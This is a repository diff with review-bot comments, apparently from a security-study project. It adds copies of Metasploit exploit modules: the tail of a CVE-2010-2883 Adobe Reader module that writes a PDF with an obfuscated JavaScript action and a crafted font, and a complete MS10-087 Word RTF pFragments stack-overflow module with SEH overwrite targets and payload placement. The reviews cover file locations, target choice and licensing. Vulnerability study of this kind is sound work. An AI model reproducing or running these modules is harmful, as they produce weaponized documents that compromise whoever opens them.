pdf << n_obfu("/Name /F1") << eol
|
||||
pdf << n_obfu("/BaseFont /Cinema") << eol
|
||||
pdf << n_obfu("/Widths []") << eol
|
||||
pdf << n_obfu("/FontDescriptor ") << io_ref(9)
|
||||
pdf << n_obfu("/Encoding /MacRomanEncoding")
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# page content
|
||||
content = "Hello World!"
|
||||
content = "" +
|
||||
"0 g" + eol +
|
||||
"BT" + eol +
|
||||
"/F1 32 Tf" + eol +
|
||||
"32 Tc" + eol +
|
||||
"1 0 0 1 32 773.872 Tm" + eol +
|
||||
"(" + content + ") Tj" + eol +
|
||||
"ET"
|
||||
|
||||
xref << pdf.length
|
||||
pdf << io_def(8) << "<<" << eol
|
||||
pdf << n_obfu("/Length %s" % content.length) << eol
|
||||
pdf << ">>" << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << content << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
# font descriptor
|
||||
xref << pdf.length
|
||||
pdf << io_def(9) << n_obfu("<<")
|
||||
pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema")
|
||||
pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17))
|
||||
pdf << n_obfu("/FontBBox [-177 -269 1123 866]")
|
||||
pdf << n_obfu("/FontFile2 ") << io_ref(10)
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# ttf stream
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ttf)
|
||||
pdf << io_def(10) << n_obfu("<</Length %s/Filter/FlateDecode/Length1 %s>>" % [compressed.length, ttf.length]) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
# js action
|
||||
xref << pdf.length
|
||||
pdf << io_def(11) << n_obfu("<<")
|
||||
pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12)
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# js stream
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(12) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
###
|
||||
# The following form related data is required to get icucnv36.dll to load
|
||||
###
|
||||
|
||||
# form object
|
||||
xref << pdf.length
|
||||
pdf << io_def(13)
|
||||
pdf << n_obfu("<</XFA ") << io_ref(14) << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# form stream
|
||||
xfa = <<-EOF
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
|
||||
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
|
||||
<present><pdf><interactive>1</interactive></pdf></present>
|
||||
</config>
|
||||
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
|
||||
<subform name="form1" layout="tb" locale="en_US">
|
||||
<pageSet></pageSet>
|
||||
</subform></template></xdp:xdp>
|
||||
EOF
|
||||
|
||||
xref << pdf.length
|
||||
pdf << io_def(14) << n_obfu("<</Length %s>>" % xfa.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << xfa << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
###
|
||||
# end form stuff for icucnv36.dll
|
||||
###
|
||||
|
||||
|
||||
# trailing stuff
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
|
||||
pdf << "trailer" << eol
|
||||
pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
|
||||
pdf << "%%EOF" << eol
|
||||
pdf
|
||||
end
|
||||
end
|
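Review bot: make_ttf reads the font from File.join(Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf"), i.e. from Metasploit's own data directory, whereas this commit stores cve-2010-2883.ttf next to the module under src/exploit/7.1.8_adobe_reader_2010-2883/; a copy of the module run from this repository will not find the font unless it is placed in that data directory, so the 7.1.8 doc should state where both files need to live. The header only says the module requires Metasploit; record that the file is a copy from the metasploit-framework repository named in the header so its origin and license (MSF_LICENSE) are clear.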
BIN
src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf
Executable file
Binary file not shown.
@ -0,0 +1,199 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in the handling of the
|
||||
'pFragments' shape property within the Microsoft Word RTF parser. All versions
|
||||
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
|
||||
MS10-087 bulletin are vulnerable.
|
||||
|
||||
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
|
||||
|
||||
The Microsoft Word RTF parser was only used by default in versions of Microsoft
|
||||
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
|
||||
began using the Word RTF parser, by default, to handle rich-text messages within
|
||||
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
|
||||
the Microsoft Word engine too, but it was not a default setting.
|
||||
|
||||
It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that
|
||||
Microsoft will confirm or deny this since Office 2000 has reached its support
|
||||
cycle end-of-life.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'wushi of team509', # original discovery
|
||||
'unknown', # exploit found in the wild
|
||||
'jduck', # Metasploit module
|
||||
'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3333' ],
|
||||
[ 'OSVDB', '69085' ],
|
||||
[ 'MSB', 'MS10-087' ],
|
||||
[ 'BID', '44652' ],
|
||||
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true # no need
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# This automatic target will combine all targets into one file :)
|
||||
[ 'Automatic', { } ],
|
||||
|
||||
# Office v10.6854.6845, winword.exe v10.0.6854.0
|
||||
[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',
|
||||
{
|
||||
'Offsets' => [ 23532, 45944 ],
|
||||
#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0
|
||||
'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0
|
||||
}
|
||||
],
|
||||
|
||||
# Office v11.8307.8324, winword.exe v11.0.8307.0
|
||||
# Office v11.8328.8221, winword.exe v11.0.8328.0
|
||||
[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',
|
||||
{
|
||||
'Offsets' => [ 24580, 51156 ],
|
||||
'Ret' => 0x30001bdd # p/p/r in winword.exe
|
||||
}
|
||||
],
|
||||
|
||||
# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.
|
||||
|
||||
# Office v12.0.6425.1000, winword.exe v12.0.6425.1000
|
||||
[ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',
|
||||
{
|
||||
'Offsets' => [ 5956 ],
|
||||
'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record
|
||||
}
|
||||
],
|
||||
|
||||
[ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',
|
||||
{
|
||||
'Offsets' => [ 5956 ],
|
||||
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
|
||||
}
|
||||
],
|
||||
|
||||
[ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',
|
||||
{
|
||||
'Offsets' => [ 5956 ],
|
||||
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
# crash on a deref path to heaven.
|
||||
[ 'Crash Target for Debugging',
|
||||
{
|
||||
'Offsets' => [ 65535 ],
|
||||
'Ret' => 0xdac0ffee
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),
|
||||
])
|
||||
end
|
||||
|
||||
def add_target(rest, targ)
|
||||
targ['Offsets'].each { |off|
|
||||
seh = generate_seh_record(targ.ret)
|
||||
rest[off, seh.length] = seh
|
||||
distance = off + seh.length
|
||||
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
||||
rest[off + seh.length, jmp_back.length] = jmp_back
|
||||
}
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Prepare a sample SEH frame and backward jmp for length calculations
|
||||
seh = generate_seh_record(0xdeadbeef)
|
||||
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string
|
||||
|
||||
# RTF property Array parameters
|
||||
el_size = sz_rand()
|
||||
el_count = sz_rand()
|
||||
|
||||
data = ''
|
||||
# These words are presumably incorrectly used
|
||||
# assert(amount1 <= amount2)
|
||||
data << [0x1111].pack('v') * 2
|
||||
data << [0xc8ac].pack('v')
|
||||
|
||||
# Filler
|
||||
if target.name =~ /Debug/i
|
||||
rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)
|
||||
else
|
||||
len = 51200 + rand(1000)
|
||||
rest = rand_text(len + seh.length + jmp_back.length)
|
||||
rest[0, payload.encoded.length] = payload.encoded
|
||||
end
|
||||
|
||||
# Stick fake SEH frames here and there ;)
|
||||
if target.name == "Automatic"
|
||||
targets.each { |t|
|
||||
next if t.name !~ /Windows/i
|
||||
|
||||
add_target(rest, t)
|
||||
}
|
||||
else
|
||||
add_target(rest, target)
|
||||
end
|
||||
|
||||
# Craft the array for the property value
|
||||
sploit = "%d;%d;" % [el_size, el_count]
|
||||
sploit << data.unpack('H*').first
|
||||
sploit << rest.unpack('H*').first
|
||||
|
||||
# Assemble it all into a nice RTF
|
||||
content = "{\\rtf1"
|
||||
content << "{\\shp" # shape
|
||||
content << "{\\sp" # shape property
|
||||
content << "{\\sn pFragments}" # property name
|
||||
content << "{\\sv #{sploit}}" # property value
|
||||
content << "}"
|
||||
content << "}"
|
||||
content << "}"
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(content)
|
||||
|
||||
end
|
||||
|
||||
def sz_rand
|
||||
bad_sizes = [ 0, 2, 4, 8 ]
|
||||
x = rand(9)
|
||||
while bad_sizes.include? x
|
||||
x = rand(9)
|
||||
end
|
||||
x
|
||||
end
|
||||
end
|
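Review bot: the Targets comments are the facts the 7.1.9 doc's empty 漏洞分析 section will depend on, and the doc does not cross-reference them: the doc's environment (Office 2003 SP3 on Windows XP SP3) corresponds to the 'Microsoft Office 2003 SP3 English on Windows XP SP3 English' entry, while the 'Automatic' default target (DefaultTarget 0) combines every Windows target into one file, so the doc should say which target was selected when the sample was generated. As with the Adobe module, the file carries no note of where it was copied from beyond the generic header.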
BIN
src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet
Normal file
Binary file not shown.